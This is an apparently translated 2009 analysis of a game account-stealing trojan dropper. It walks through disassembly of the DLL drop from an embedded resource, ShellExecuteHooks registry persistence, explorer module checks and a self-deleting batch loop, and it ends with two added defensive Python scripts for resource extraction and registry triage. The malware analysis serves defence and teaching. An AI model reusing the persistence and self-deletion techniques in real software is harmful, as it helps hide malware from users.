Analysis of an online game account-stealing trojan
Published: Wednesday, 2 September 2009
[Author's note]: I learned assembly in July this year, bought 加密与解密 (Encryption and Decryption), 3rd edition, in September and formally began studying software security. Having come this far, I have a lot of feelings about it! I am publishing an article before the new year arrives to mark the occasion ^-^
This article analyses the virus's source file and the DLL it generates separately. The virus performs the following actions:

(1) When run, the virus drops rijxckin.dll into C:\WINDOWS\system32\
(2) It creates the following registry entries:
    1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JXQY\Url
    2. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\"" (the default value)
    3. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\ThreadingModel
    4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353}, content "rijxckin.dll"
(3) It injects the file C:\WINDOWS\system32\rijxzkin.dll into the explorer process
(4) It creates a .bat file in the temporary folder to delete the virus's own executable. The .bat file's content is as follows (C:\a.exe is the path of the virus file):

@echo off
:Loop
del "C:\a.exe"
if exist "C:\a.exe" goto Loop

The loop retries the delete until the dropper process has exited and the file is no longer locked, so after installation nothing remains on disk except the DLL and the registry entries. (The write-up uses both spellings, rijxckin.dll and rijxzkin.dll, for the dropped file; when writing indicators, check which spelling the sample in hand actually uses.)

(1) When run, the virus drops rijxckin.dll into C:\WINDOWS\system32\

Step 1: look in C:\WINDOWS\system32\ to see whether rijxckin.dll is already there

Unpacker:004026A8 FindFile proc near ; CODE XREF: FindBatFileAndDel+8 p
Unpacker:004026A8 ; FindBatFileAndDel+24 p ...
Unpacker:004026A8
Unpacker:004026A8 var_144 = ptr -144h
Unpacker:004026A8
Unpacker:004026A8 push ebx
Unpacker:004026A9 add esp, 0FFFFFEC0h
Unpacker:004026AF xor ebx, ebx
Unpacker:004026B1 push esp ; lpFindFileData
Unpacker:004026B2 push eax ; lpFileName
Unpacker:004026B3 call FindFirstFileA
Unpacker:004026B8 cmp eax, 0FFFFFFFFh
Unpacker:004026BB jz loc_4026C5
Unpacker:004026BD test [esp+144h+var_144], 10h
Unpacker:004026C1 jnz loc_4026C5
Unpacker:004026C3 mov bl, 1
Unpacker:004026C5
Unpacker:004026C5 loc_4026C5: ; CODE XREF: FindFile+13 j
Unpacker:004026C5 ; FindFile+19 j
Unpacker:004026C5 push eax ; hFindFile
Unpacker:004026C6 call FindClose
Unpacker:004026CB mov eax, ebx
Unpacker:004026CD add esp, 140h
Unpacker:004026D3 pop ebx
Unpacker:004026D4 retn
Unpacker:004026D4 FindFile endp

The file name arrives in eax (Borland's register calling convention passes the first three arguments in eax, edx and ecx), and the 140h bytes reserved on the stack hold the WIN32_FIND_DATA. The function returns 1 in al only if FindFirstFileA succeeded and dwFileAttributes (the first dword of the structure) does not have FILE_ATTRIBUTE_DIRECTORY (10h) set. Note that FindClose is reached even when FindFirstFileA returned INVALID_HANDLE_VALUE (0FFFFFFFFh).

Step 2: if it is not there, release rijxckin.dll from the virus's own file into C:\WINDOWS\system32\

Unpacker:00402E2C push esi ; lpFileName
Unpacker:00402E2D mov ecx, offset dword_402F00 ; ASCII "ICO"
Unpacker:00402E32 mov edx, offset aMain ; "MAIN"
Unpacker:00402E37 xor eax, eax ; hModule
Unpacker:00402E39 call CreateDllFile
{
Unpacker:00402AAC CreateDllFile proc near ; CODE XREF:
Unpacker:00402AAC ; sub_402E18+21 p
Unpacker:00402AAC
Unpacker:00402AAC NumberOfBytesWritten = dword ptr -4
Unpacker:00402AAC lpFileName = dword ptr 8
Unpacker:00402AAC
Unpacker:00402AAC push ebp
Unpacker:00402AAD mov ebp, esp
Unpacker:00402AAF push ecx
Unpacker:00402AB0 push ebx
Unpacker:00402AB1 push esi
Unpacker:00402AB2 push edi
Unpacker:00402AB3 mov ebx, eax
Unpacker:00402AB5 push ecx ; lpType
Unpacker:00402AB6 push edx ; lpName
Unpacker:00402AB7 push ebx ; hModule
Unpacker:00402AB8 call FindResourceA
Unpacker:00402ABD mov esi, eax
Unpacker:00402ABF push esi ; hResInfo
Unpacker:00402AC0 push ebx ; hModule
Unpacker:00402AC1 call SizeofResource
Unpacker:00402AC6 mov edi, eax ; eax = 5E00h
Unpacker:00402AC8 push esi ; hResInfo
Unpacker:00402AC9 push ebx ; hModule
Unpacker:00402ACA call LoadResource
Unpacker:00402ACF push eax ; hResData
Unpacker:00402AD0 call LockResource
Unpacker:00402AD5 mov esi, eax
Unpacker:00402AD7 push 0 ; hTemplateFile
Unpacker:00402AD9 push 80h ; dwFlagsAndAttributes
Unpacker:00402ADE push 2 ; dwCreationDisposition
Unpacker:00402AE0 push 0 ; lpSecurityAttributes
Unpacker:00402AE2 push 2 ; dwShareMode
Unpacker:00402AE4 push 40000000h ; dwDesiredAccess
Unpacker:00402AE9 mov eax, [ebp+lpFileName]
Unpacker:00402AEC push eax ; lpFileName = "C:\WINDOWS\system32\rijxzkin.dll"
Unpacker:00402AED call CreateFileA
Unpacker:00402AF2 mov ebx, eax
Unpacker:00402AF4 push 0 ; lpOverlapped
Unpacker:00402AF6 lea eax, [ebp+NumberOfBytesWritten]
Unpacker:00402AF9 push eax ; lpNumberOfBytesWritten
Unpacker:00402AFA push edi ; nNumberOfBytesToWrite, file length 5E00h
Unpacker:00402AFB push esi ; lpBuffer, ASCII "MZP"
Unpacker:00402AFC push ebx ; hFile
Unpacker:00402AFD call WriteFile_0
Unpacker:00402B02 push ebx ; hObject
Unpacker:00402B03 call CloseHandle
Unpacker:00402B08 mov al, 1
Unpacker:00402B0A pop edi
Unpacker:00402B0B pop esi
Unpacker:00402B0C pop ebx
Unpacker:00402B0D pop ecx
Unpacker:00402B0E pop ebp
Unpacker:00402B0F retn 4
Unpacker:00402B0F CreateDllFile endp
}

With the register convention in mind, the call site reads CreateDllFile(hModule = 0, lpName = "MAIN", lpType = "ICO", lpFileName on the stack). A NULL hModule makes FindResourceA search the calling executable, so the DLL is carried inside the dropper itself as a resource named "MAIN" of the custom type "ICO", 5E00h (24064) bytes long and beginning with "MZP" (the DOS stub signature Borland linkers emit). CreateFileA is called with GENERIC_WRITE (40000000h), FILE_SHARE_WRITE (2), CREATE_ALWAYS (2) and FILE_ATTRIBUTE_NORMAL (80h), so any existing file of that name is overwritten. None of the API return values are checked; the function unconditionally returns 1.

(2) Creating the registry entries
1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JXQY\Url, content 00 (200h)
2. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\"" (the default value)
3. HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\ThreadingModel
4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353}, content "rijxckin.dll"

The routine that adds a registry value is:

Unpacker:00402B14 AddRegKey proc near ; CODE XREF: sub_402C1C+7F p
Unpacker:00402B14 ; sub_402C1C+D0 p ...
Unpacker:00402B14
Unpacker:00402B14 hKey = dword ptr -4
Unpacker:00402B14 cbData = dword ptr 8
Unpacker:00402B14 lpData = dword ptr 0Ch
Unpacker:00402B14 dwType = dword ptr 10h
Unpacker:00402B14
Unpacker:00402B14 push ebp
Unpacker:00402B15 mov ebp, esp
Unpacker:00402B17 push ecx
Unpacker:00402B18 push ebx
Unpacker:00402B19 mov ebx, ecx
Unpacker:00402B1B lea ecx, [ebp+hKey]
Unpacker:00402B1E push ecx ; phkResult
Unpacker:00402B1F push edx ; lpSubKey
Unpacker:00402B20 push eax ; hKey
Unpacker:00402B21 call RegCreateKeyA
Unpacker:00402B26 mov eax, [ebp+cbData]
Unpacker:00402B29 push eax ; cbData
Unpacker:00402B2A mov eax, [ebp+lpData]
Unpacker:00402B2D push eax ; lpData
Unpacker:00402B2E mov eax, [ebp+dwType]
Unpacker:00402B31 push eax ; dwType
Unpacker:00402B32 push 0 ; Reserved
Unpacker:00402B34 push ebx ; lpValueName
Unpacker:00402B35 mov eax, [ebp+hKey]
Unpacker:00402B38 push eax ; hKey
Unpacker:00402B39 call RegSetValueExA
Unpacker:00402B3E mov ebx, eax
Unpacker:00402B40 mov eax, [ebp+hKey]
Unpacker:00402B43 push eax ; hKey
Unpacker:00402B44 call RegCloseKey_0
Unpacker:00402B49 mov eax, ebx
Unpacker:00402B4B pop ebx
Unpacker:00402B4C pop ecx
Unpacker:00402B4D pop ebp
Unpacker:00402B4E retn 0Ch
Unpacker:00402B4E AddRegKey endp

AddRegKey takes the root key in eax, the subkey path in edx and the value name in ecx, with dwType, lpData and cbData on the stack (hence retn 0Ch). It creates the key with RegCreateKeyA, writes the value with RegSetValueExA, closes the key and returns the RegSetValueExA status. It is called from four places, each creating one value:

00402A34 creates HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JXQY\Url, content 00 (200h)
00402C9B creates HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\"" (the default value),
00402CEC creates HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32\ThreadingModel,
00402D4C creates HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353}, content "rijxckin.dll"

Entries 2 to 4 are the persistence mechanism. They register the dropped DLL as a COM in-process server under its own CLSID and list that CLSID under ShellExecuteHooks; explorer.exe (and any other process that calls ShellExecute) instantiates every hook CLSID listed there in-process, so the DLL is loaded into explorer at every logon without touching the usual Run keys. A triage check for this family therefore has to enumerate ShellExecuteHooks and resolve each CLSID's InprocServer32 path, not just inspect Run/RunOnce.

(3) Injecting the file C:\WINDOWS\system32\rijxzkin.dll into the explorer process. This is done in 3 steps.

Step 1: get the explorer.exe handle

Unpacker:00402510 GetExplorerHandle proc near ; CODE XREF: sub_402DD8+8 p
Unpacker:00402510
Unpacker:00402510 var_138 = dword ptr -138h
Unpacker:00402510 var_114 = ptr -114h
Unpacker:00402510
Unpacker:00402510 push ebx
Unpacker:00402511 push esi
Unpacker:00402512 push edi
Unpacker:00402513 push ebp
Unpacker:00402514 add esp, 0FFFFFED8h
Unpacker:0040251A mov ebx, edx
Unpacker:0040251C mov esi, eax
Unpacker:0040251E xor edi, edi
Unpacker:00402520 xor edx, edx
Unpacker:00402522 mov eax, 2
Unpacker:00402527 call CreateModuleSnapshot ; create a snapshot
Unpacker:0040252C mov ebp, eax
Unpacker:0040252E mov [esp+138h+var_138], 128h
Unpacker:00402535 mov edx, esp
Unpacker:00402537 mov eax, ebp
Unpacker:00402539 call FindProcess ; BDS 2005-2006 and Delphi6-7 Visual Component Library
Unpacker:0040253E jmp loc_402560
Unpacker:00402540 ; ---------------------------------------------------------------------------
Unpacker:00402540
Unpacker:00402540 loc_402540: ; CODE XREF: GetExplorerHandle+58 j
Unpacker:00402540 lea eax, [esp+138h+var_114]
Unpacker:00402544
Unpacker:00402544 loc_402544: ; CODE XREF: Unpacker:loc_40BA44 j
Unpacker:00402544 ; DATA XREF: Unpacker:0040BA3F o
Unpacker:00402544 push eax
Unpacker:00402545 push esi
Unpacker:00402546 call lstrcmpi ; compare the process name with "explorer"; if it does not match, loop and fetch the next one
Unpacker:0040254B test eax, eax
Unpacker:0040254D jnz loc_402557
Unpacker:0040254F mov edi, [esp+140h+var_138]
Unpacker:00402553 test bl, bl
Unpacker:00402555 jz loc_40256A
Unpacker:00402557
Unpacker:00402557 loc_402557: ; CODE XREF: GetExplorerHandle+3D j
Unpacker:00402557 mov edx, esp
Unpacker:00402559 mov eax, ebp
Unpacker:0040255B call FindProcessNext ; fetch the next process name from the snapshot
Unpacker:00402560
Unpacker:00402560 loc_402560: ; CODE XREF: GetExplorerHandle+2E j
Unpacker:00402560 cmp eax, 1
Unpacker:00402563 sbb eax, eax
Unpacker:00402565 inc eax
Unpacker:00402566 cmp al, 1
Unpacker:00402568 jz loc_402540
Unpacker:0040256A
Unpacker:0040256A loc_40256A: ; CODE XREF: GetExplorerHandle+45 j
Unpacker:0040256A push ebp ; hObject
Unpacker:0040256B call CloseHandle
Unpacker:00402570 mov eax, edi
Unpacker:00402572 add esp, 128h
Unpacker:00402578 pop ebp
Unpacker:00402579 pop edi
Unpacker:0040257A pop esi
Unpacker:0040257B pop ebx
Unpacker:0040257B GetExplorerHandle endp

CreateModuleSnapshot, FindProcess and FindProcessNext are the analyst's names; the arguments identify them as CreateToolhelp32Snapshot (eax = 2 = TH32CS_SNAPPROCESS, edx = 0), Process32First and Process32Next, with dwSize of the PROCESSENTRY32 on the stack set to 128h. The lstrcmpi call compares szExeFile (offset 24h of the structure) with the name passed in eax ("explorer"); on a match the th32ProcessID field (offset 8) is saved in edi, and if the flag passed in edx is zero the loop stops at the first match (otherwise it keeps scanning and returns the last one). The sequence cmp eax, 1 / sbb eax, eax / inc eax / cmp al, 1 is the Delphi compiler's normalisation of the BOOL result, so the loop runs while Process32First/Next return non-zero. Despite its name, the routine therefore returns the process ID of explorer.exe rather than a handle.

Step 2: check whether explorer already has rijxzkin.dll loaded

Unpacker:00402580 FindDllModule proc near ; CODE XREF: sub_402DD8+18 p
Unpacker:00402580
Unpacker:00402580 var_234 = dword ptr -234h
Unpacker:00402580 var_220 = dword ptr -220h
Unpacker:00402580 var_214 = ptr -214h
Unpacker:00402580 var_114 = ptr -114h
Unpacker:00402580
Unpacker:00402580 push ebx
Unpacker:00402581 push esi
Unpacker:00402582 push edi
Unpacker:00402583 push ebp
Unpacker:00402584 add esp, 0FFFFFDDCh
Unpacker:0040258A mov edi, ecx
Unpacker:0040258C mov ebx, edx
Unpacker:0040258E mov esi, eax
Unpacker:00402590 xor ebp, ebp
Unpacker:00402592 test edi, edi
Unpacker:00402594 jz loc_4025A2
Unpacker:00402596 mov edx, 104h
Unpacker:0040259B mov eax, edi
Unpacker:0040259D call @Windows@ZeroMemory$qqrpvui ; Windows::ZeroMemory(void *,uint)
Unpacker:004025A2
Unpacker:004025A2 loc_4025A2: ; CODE XREF: FindDllModule+14 j
Unpacker:004025A2 mov edx, esi
Unpacker:004025A4 mov eax, 8
Unpacker:004025A9 call CreateModuleSnapshot ; create a snapshot
Unpacker:004025AE mov esi, eax
Unpacker:004025B0 mov [esp+234h+var_234], 224h
Unpacker:004025B0 ; CODE XREF: Unpacker:loc_40BAB4 j
Unpacker:004025B7 mov edx, esp
Unpacker:004025B9 mov eax, esi
Unpacker:004025BB call FindModuleFirst ; look for "rijxzkin.dll" among the modules of the explorer process
Unpacker:004025C0 cmp eax, 1
Unpacker:004025C3 sbb eax, eax
Unpacker:004025C5 inc eax
Unpacker:004025C6 cmp al, 1
Unpacker:004025C8 jnz loc_402608
Unpacker:004025CA
Unpacker:004025CA loc_4025CA: ; CODE XREF: FindDllModule+86 j
Unpacker:004025CA test ebx, ebx
Unpacker:004025CC jz loc_4025DD
Unpacker:004025CE lea eax, [esp+234h+var_214]
Unpacker:004025D2 push eax
Unpacker:004025D3 push ebx
Unpacker:004025D4 call lstrcmpi
Unpacker:004025D9 test eax, eax
Unpacker:004025DB jnz loc_4025F5
Unpacker:004025DD
Unpacker:004025DD loc_4025DD: ; CODE XREF: FindDllModule+4C j
Unpacker:004025DD test edi, edi
Unpacker:004025DF jz loc_4025EF
Unpacker:004025E1 lea eax, [esp+234h+var_114]
Unpacker:004025E8 push eax
Unpacker:004025E9 push edi
Unpacker:004025EA call lstrcpy
Unpacker:004025EF
Unpacker:004025EF loc_4025EF: ; CODE XREF: FindDllModule+5F j
Unpacker:004025EF mov ebp, [esp+234h+var_220]
Unpacker:004025F3 jmp loc_402608
Unpacker:004025F5 ; ---------------------------------------------------------------------------
Unpacker:004025F5
Unpacker:004025F5 loc_4025F5: ; CODE XREF: FindDllModule+5B j
Unpacker:004025F5 mov edx, esp
Unpacker:004025F7 mov eax, esi
Unpacker:004025F9 call FindModuleNext ; keep looking for "rijxzkin.dll" among the modules loaded in the explorer process
Unpacker:004025FE cmp eax, 1
Unpacker:00402601 sbb eax, eax
Unpacker:00402603 inc eax
Unpacker:00402604 cmp al, 1
Unpacker:00402606 jz loc_4025CA
Unpacker:00402608
Unpacker:00402608 loc_402608: ; CODE XREF: FindDllModule+48 j
Unpacker:00402608 ; FindDllModule+73 j
Unpacker:00402608 push esi ; hObject
Unpacker:00402609 call CloseHandle
Unpacker:0040260E mov eax, ebp
Unpacker:00402610 add esp, 224h
Unpacker:00402616 pop ebp
Unpacker:00402617 pop edi
Unpacker:00402618 pop esi
Unpacker:00402619 pop ebx
Unpacker:0040261A retn
Unpacker:0040261A FindDllModule endp

Here eax = 8 = TH32CS_SNAPMODULE and edx = the explorer process ID obtained in step 1, so the snapshot covers the modules loaded in explorer.exe, and 224h is sizeof(MODULEENTRY32). For each module, szModule (offset 20h, var_214) is compared case-insensitively with the DLL name passed in edx (ebx); if no name was given, the first entry matches. On a match the module's full path szExePath (offset 120h, var_114) is copied into the caller's buffer passed in ecx (edi, zeroed to 104h = MAX_PATH bytes beforehand) and modBaseAddr (offset 14h, var_220) is returned in eax. A zero return means the DLL is not yet loaded in explorer; a non-zero return means it is already there from a previous run.
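The resource walk in step 2 of section (1) (FindResourceA for name "MAIN" and type "ICO", then LoadResource, LockResource and WriteFile) can be reproduced statically to pull the DLL out of a dropper without running it. The script below is an added example, not code from the write-up; it parses the PE headers and the three-level resource directory itself, so it needs no third-party module, and it is exercised on a small PE image constructed inline. The SAMPLE_DLL payload, the section layout and the language ID 409h are assumptions of the example (the real payload is 5E00h bytes); the "MZ" check mirrors the "MZP" the author saw at lpBuffer.

```python
"""Static extraction of the embedded DLL from the dropper's resource section (added example)."""
import struct

IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
# Constructed stand-in for the 5E00h-byte payload; like the real one it starts with "MZP".
SAMPLE_DLL = b"MZP" + b"\0" * 61


def _u16(b, o):
    return struct.unpack_from("<H", b, o)[0]


def _u32(b, o):
    return struct.unpack_from("<I", b, o)[0]


def _headers(pe):
    """Return (file offset of the optional header, [(va, vsize, raw_ptr, raw_size), ...])."""
    e_lfanew = _u32(pe, 0x3C)
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 24
    first = opt + _u16(pe, e_lfanew + 20)                   # + SizeOfOptionalHeader
    secs = []
    for i in range(_u16(pe, e_lfanew + 6)):                 # NumberOfSections
        s = first + 40 * i
        secs.append((_u32(pe, s + 12), _u32(pe, s + 8), _u32(pe, s + 20), _u32(pe, s + 16)))
    return opt, secs


def _rva_to_off(secs, rva):
    for va, vsize, raw_ptr, raw_size in secs:
        if va <= rva < va + max(vsize, raw_size):
            return raw_ptr + (rva - va)
    raise ValueError("RVA %#x is not backed by any section" % rva)


def _entries(pe, base, d):
    """Yield (name or id, offset field) for the IMAGE_RESOURCE_DIRECTORY at file offset d."""
    for i in range(_u16(pe, d + 12) + _u16(pe, d + 14)):   # named entries come first, then ids
        name, off = _u32(pe, d + 16 + 8 * i), _u32(pe, d + 20 + 8 * i)
        if name & 0x80000000:                               # high bit: offset of a length-prefixed UTF-16 name
            s = base + (name & 0x7FFFFFFF)
            name = pe[s + 2:s + 2 + 2 * _u16(pe, s)].decode("utf-16-le")
        yield name, off


def find_resource(pe, rtype, rname):
    """FindResourceA(hModule, rname, rtype) + LockResource, done on the file image: bytes or None."""
    opt, secs = _headers(pe)
    base = _rva_to_off(secs, _u32(pe, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE))

    def same(key, want):                                    # names compare case-insensitively, ids exactly
        if isinstance(key, str) and isinstance(want, str):
            return key.upper() == want.upper()
        return key == want

    for tname, toff in _entries(pe, base, base):            # level 1: type ("ICO")
        if not same(tname, rtype) or not toff & 0x80000000:
            continue
        for nname, noff in _entries(pe, base, base + (toff & 0x7FFFFFFF)):      # level 2: name ("MAIN")
            if not same(nname, rname) or not noff & 0x80000000:
                continue
            for _lang, doff in _entries(pe, base, base + (noff & 0x7FFFFFFF)):  # level 3: language
                entry = base + doff                         # IMAGE_RESOURCE_DATA_ENTRY; first language wins
                off = _rva_to_off(secs, _u32(pe, entry))
                return bytes(pe[off:off + _u32(pe, entry + 4)])
    return None


def extract_dropped_dll(pe):
    """Return the MAIN/ICO payload when it carries a DOS header, as the dropper's "MZP" blob does."""
    blob = find_resource(pe, "ICO", "MAIN")
    return blob if blob is not None and blob[:2] == b"MZ" else None


def build_sample_pe(payload):
    """Constructed test image (not the real dropper): one .rsrc section with ICO/MAIN -> payload."""
    rsrc_rva, raw_ptr = 0x1000, 0x200
    tdir, ndir, dent, s_ico, s_main, data = 24, 48, 72, 88, 96, 106   # offsets inside .rsrc

    def directory(named, ids):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)

    rs = bytearray()
    rs += directory(1, 0) + struct.pack("<II", 0x80000000 | s_ico, 0x80000000 | tdir)    # root  -> "ICO"
    rs += directory(1, 0) + struct.pack("<II", 0x80000000 | s_main, 0x80000000 | ndir)   # "ICO" -> "MAIN"
    rs += directory(0, 1) + struct.pack("<II", 0x409, dent)                               # "MAIN" -> lang 409h
    rs += struct.pack("<IIII", rsrc_rva + data, len(payload), 0, 0)                       # data entry (RVA, size)
    rs += struct.pack("<H", 3) + "ICO".encode("utf-16-le") + struct.pack("<H", 4) + "MAIN".encode("utf-16-le")
    assert len(rs) == data
    rs += payload
    dos = bytearray(0x40)
    dos[:2], dos[0x3C:] = b"MZ", struct.pack("<I", 0x40)                                  # e_lfanew
    opt = bytearray(224)                                                                   # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)                                                    # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE, rsrc_rva, len(rs))
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x2102)
    sec = b".rsrc".ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(rs), rsrc_rva, len(rs), raw_ptr, 0, 0, 0, 0, 0x40000040)
    return bytes((dos + b"PE\0\0" + coff + opt + sec).ljust(raw_ptr, b"\0") + rs)
```

To use it on a real dropper, read the file into bytes and pass it to extract_dropped_dll, then write the result out. FindResourceA chooses the resource language from the thread locale; the script simply takes the first language entry, which is sufficient for a single-language payload like this one. The same walk, with the type and name parameters changed, also recovers the other resources a packed sample carries.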
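The four registry writes in section (2) give a concrete triage check for this persistence technique: enumerate ShellExecuteHooks, resolve each hook CLSID to its InprocServer32 server and flag anything outside a known baseline. The script below is an added example, not from the write-up. It works on a text export in `reg export` format so it can run offline against a dump collected from the machine, handles string values only, and the export it is exercised on is constructed to resemble the keys described above; the shell32.dll and Apartment values and the Windows XP baseline CLSID are the example's assumptions.

```python
"""Triage of ShellExecuteHooks persistence from a registry export (added example)."""

HOOKS_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks"

# Assumed baseline: the one hook present on a stock Windows XP installation is shell32's
# "URL Exec Hook". Replace with the baseline of the systems you triage.
KNOWN_GOOD_HOOKS = {"{AEB6717E-7E19-11D0-97EE-00C0FD7B1DB5}"}

# Constructed export resembling the keys the write-up describes (not taken from a real system).
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks]
"{AEB6717E-7E19-11d0-97EE-00C0FD7B1DB5}"=""
"{35FD6584-698F-BCD2-602C-698745210353}"=""

[HKEY_CLASSES_ROOT\CLSID\{AEB6717E-7E19-11d0-97EE-00C0FD7B1DB5}\InprocServer32]
@="shell32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C-698745210353}\InprocServer32]
@="rijxckin.dll"
"ThreadingModel"="Apartment"
'''


def parse_reg_export(text):
    """Return {key path: {value name: data}}; "@" becomes "" (the default value). String values only."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = "" if name == "@" else name.strip('"')
            quoted = len(data) >= 2 and data[0] == data[-1] == '"'
            keys[current][name] = data[1:-1] if quoted else data
    return keys


def suspicious_hooks(reg_text, known_good=KNOWN_GOOD_HOOKS):
    """Return [(CLSID, InprocServer32 server)] for every hook that is not in the baseline."""
    # Registry paths are case-insensitive, so compare everything upper-cased.
    by_path = {k.upper(): v for k, v in parse_reg_export(reg_text).items()}
    findings = []
    for clsid in by_path.get(HOOKS_KEY.upper(), {}):
        clsid = clsid.upper()
        if clsid in known_good:
            continue
        server_key = (r"HKEY_CLASSES_ROOT\CLSID\%s\InprocServer32" % clsid).upper()
        server = by_path.get(server_key, {}).get("", "<no InprocServer32>")
        findings.append((clsid, server))
    return findings


if __name__ == "__main__":
    import sys
    # reg export writes UTF-16 with a BOM; with no argument the constructed sample is used.
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else SAMPLE_REG_EXPORT
    for clsid, server in suspicious_hooks(text):
        print("ShellExecuteHook %s -> %s" % (clsid, server))
```

On the sample export the only finding is the trojan's CLSID resolving to rijxckin.dll. A server given as a bare file name, as here, is located through the normal DLL search order, so the next step in a live investigation is to hash the file from the system32 directory and check whether it is loaded in explorer.exe, exactly the condition the dropper's own FindDllModule tests for.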